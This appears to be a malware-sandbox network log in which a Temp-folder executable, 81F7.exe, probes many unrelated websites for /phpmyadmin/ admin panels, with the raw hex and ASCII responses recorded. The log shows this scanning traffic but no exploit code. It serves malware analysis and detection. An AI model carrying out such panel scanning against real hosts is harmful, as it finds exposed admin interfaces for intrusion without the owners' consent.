2024-02-20 23:26:05 UTC	503	IN	Data Raw: 6c 61 73 74 2d 6d 6f 64 69 66 69 65 64 3a 20 54 75 65 2c 20 32 30 20 46 65 62 20 32 30 32 34 20 32 33 3a 32 36 3a 30 35 20 47 4d 54 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 63 38 69 6c 74 70 52 77 6e 34 25 32 46 36 4d 62 45 79 48 52 36 59 4f 51 4a 44 6b 4f 25 32 42 59 30 36 77 52 78 68 25 32 42 66 41 58 61 52 72 4c 47 43 62 6d 78 78 6a 61 31 46 78 52 42 73 72 50 34 77 39 6b 33 77 62 46 50 7a 6f 79 35 50 64 42 48 6f 72 31 56 77 5a 73 4f 30 55 76 6f 6b 71 4a 66 30 77 4e 38 78 41 30 25 Data Ascii: last-modified: Tue, 20 Feb 2024 23:26:05 GMTCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8iltpRwn4%2F6MbEyHR6YOQJDkO%2BY06wRxh%2BfAXaRrLGCbmxxja1FxRBsrP4w9k3wbFPzoy5PdBHor1VwZsO0UvokqJf0wN8xA0%
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 34 37 64 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 47db<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a Data Ascii: <script data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="j
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 6a 73 2f 64 69 73 74 2f 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f Data Ascii: js/dist/codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 6c 6f 73 65 54 65 78 74 20 3d 20 27 44 6f 6e 65 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 Data Ascii: loseText = 'Done'; $.datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March',
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 Data Ascii: ''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 Data Ascii: ax: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equal\u0020to\u0020\u007B
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 75 65 72 79 2f 6a 71 75 65 72 79 2e 76 61 6c 69 64 61 74 65 2e 6d 69 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2d 74 69 6d 65 70 69 63 6b 65 72 2d 61 64 64 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 64 65 62 6f 75 6e 63 65 2d 31 2e 30 2e 36 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 6e 75 5f 72 65 73 69 7a 65 72 2e 6a 73 27 2c 20 31 29 0a 20 20 2e 61 64 64 28 27 63 72 6f 73 73 5f 66 72 61 6d 69 6e 67 5f 70 72 6f 74 65 63 74 69 6f 6e 2e 6a 73 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 6d 65 73 73 61 67 65 73 2e 70 68 70 27 2c 20 30 29 0a 20 20 2e 61 64 64 28 27 63 6f 6e 66 69 67 2e 6a 73 Data Ascii: uery/jquery.validate.min.js', 0) .add('vendor/jquery/jquery-ui-timepicker-addon.js', 0) .add('vendor/jquery/jquery.debounce-1.0.6.js', 0) .add('menu_resizer.js', 1) .add('cross_framing_protection.js', 0) .add('messages.php', 0) .add('config.js
2024-02-20 23:26:05 UTC	1369	IN	Data Raw: 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 6e 61 76 69 67 61 74 69 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 69 6e 64 65 78 65 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 63 6f 6d 6d 6f 6e 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 70 61 67 65 5f 73 65 74 74 69 6e 67 73 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 4a 41 58 2e 66 69 72 65 4f 6e 6c 6f 61 64 28 27 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 27 29 3b 0a 20 20 20 20 20 20 41 Data Ascii: X.fireOnload('navigation.js'); AJAX.fireOnload('indexes.js'); AJAX.fireOnload('common.js'); AJAX.fireOnload('page_settings.js'); AJAX.fireOnload('vendor/tracekit.js'); AJAX.fireOnload('error_report.js'); A

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	51901	103.224.182.253	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	271	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:05 GMT server: Apache set-cookie: __tad=1708471565.3757625; expires=Fri, 17-Feb-2034 23:26:05 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 168 content-type: text/html; charset=UTF-8 connection: close
2024-02-20 23:26:05 UTC	168	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 66 72 2e 61 75 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 09 3c 21 2d 2d 20 42 6c 61 6e 6b 20 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a Data Ascii: <html><head><title>fr.au</title><script type="text/javascript"></script></head><body bgcolor="#ffffff" text="#000000">... Blank --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	51344	185.39.146.199	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	781	IN	HTTP/1.1 301 Moved Permanently date: Tue, 20 Feb 2024 23:26:05 GMT expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache set-cookie: PHPSESSID=eb6a308seiaepdoqjmnlt5cqcg; expires=Fri, 10-Jun-2078 22:52:10 GMT; Max-Age=1713655565; path=/; secure; HttpOnly; SameSite=None location: https://www.markoren.no/phpmyadmin/ access-control-allow-origin: * access-control-allow-methods: GET,POST,OPTIONS,DELETE,PUT access-control-allow-headers: X-Requested-With, Content-Type, Origin, Cache-Control, Pragma, Authorization, Accept, Accept-Encoding, token content-length: 0 content-type: text/html; charset=iso-8859-1 x-backend: server2 x-type: customer x-varnish: 966655567 age: 0 x-server: varnish-1 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	51748	75.2.70.75	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: eyegage.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	183	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 166 Connection: close Location: https://www.eyegage.com/phpmyadmin/
2024-02-20 23:26:05 UTC	166	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	51794	185.230.63.186	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	181	OUT	GET /phpmyadmin/ HTTP/1.1 Host: montessorihawaii.org Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	839	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Length: 0 Connection: close location: https://www.montessorihawaii.org/phpmyadmin strict-transport-security: max-age=3600 x-wix-request-id: 1708471565.2471478442699122153 Age: 0 Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=42 X-Seen-By: pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLseIu4dGXwqDk+m1otFKtK/V0TBmJ+uLPQ4OZPC1VSMH,2d58ifebGbosy5xc+FRaltD60oxiiTg1Hu0/S4Rf2rfFKMF1/ova9YX8ig4AlelEYN3OeJKxguuFYGStMTT8rg==,2UNV7KOq4oGjA5+PKsX47PmOi36p/Q7Ico3sut0FtX4fbJaKSXYQ/lskq2jK6SGP,ttZawIJkYKmjc/NH+jiCcnCQrDd5pCY7L37bT7qLO6U=,mKaRWos/zMP5pe1EkxMqWs8DqAwKLEYCI354Y33x8XA=,/j+AjfLiOiE0Vc9NsP8sK5u8Qsk402xLUnMD3SjpKh94x31OHVUG/2k0Z4Dsbv6NA62VGTLLBfcAQHnKF5lgxw== Cache-Control: no-cache X-Content-Type-Options: nosniff

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	51946	162.241.216.197	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	186	OUT	GET /phpmyadmin/ HTTP/1.1 Host: wilsonfamilyinsurance.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:08 UTC	500	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:08 GMT Server: nginx/1.21.6 Content-Type: text/html; charset=UTF-8 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://wilsonfamilyinsurance.com/wp-json/>; rel="https://api.w.org/" Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 Set-Cookie: PHPSESSID=a7c53cbda29ac3f1aa031a7966ea7724; path=/ Transfer-Encoding: chunked
2024-02-20 23:26:08 UTC	7692	IN	Data Raw: 31 64 64 64 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 20 0d 0a 0d 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 57 69 6c 73 6f 6e 20 46 61 6d 69 6c 79 Data Ascii: 1ddd<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"> <title>Page not found – Wilson Family
2024-02-20 23:26:09 UTC	8151	IN	Data Raw: 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 74 6f 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 32 2c 31 38 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 Data Ascii: id-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivi
2024-02-20 23:26:09 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:09 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 70 61 6c 65 2d 6f 63 65 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 69 64 6e 69 67 68 74 2d 67 72 61 64 69 65 6e 74 2d 62 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 Data Ascii: 2000-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--g
2024-02-20 23:26:09 UTC	6	IN	Data Raw: 20 69 64 3d 22 6d Data Ascii: id="m
2024-02-20 23:26:09 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:09 UTC	6024	IN	Data Raw: 31 37 37 62 0d 0a 6f 62 69 6c 65 2d 6d 22 20 63 6c 61 73 73 3d 22 6d 6f 62 69 6c 65 2d 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6c 6f 73 65 2d 6d 65 6e 75 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 74 69 6d 65 73 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 6f 70 2d 68 65 61 64 20 64 2d 6e 6f 6e 65 20 64 2d 6c 67 2d 62 6c 6f 63 6b 22 3e 0d 0a Data Ascii: 177bobile-m" class="mobile-menu"> <span class="close-menu"> <i class="fa fa-times"></i> </span> </div> </div> <div class="top-head d-none d-lg-block">

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	52251	85.214.145.11	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:05 UTC	173	OUT	GET /phpmyadmin/ HTTP/1.1 Host: braekling.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	448	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://braekling.de/wp-json/>; rel="https://api.w.org/" Server-Timing: wp-before-template;dur=327.35, wp-before-template-db-queries;dur=9.67
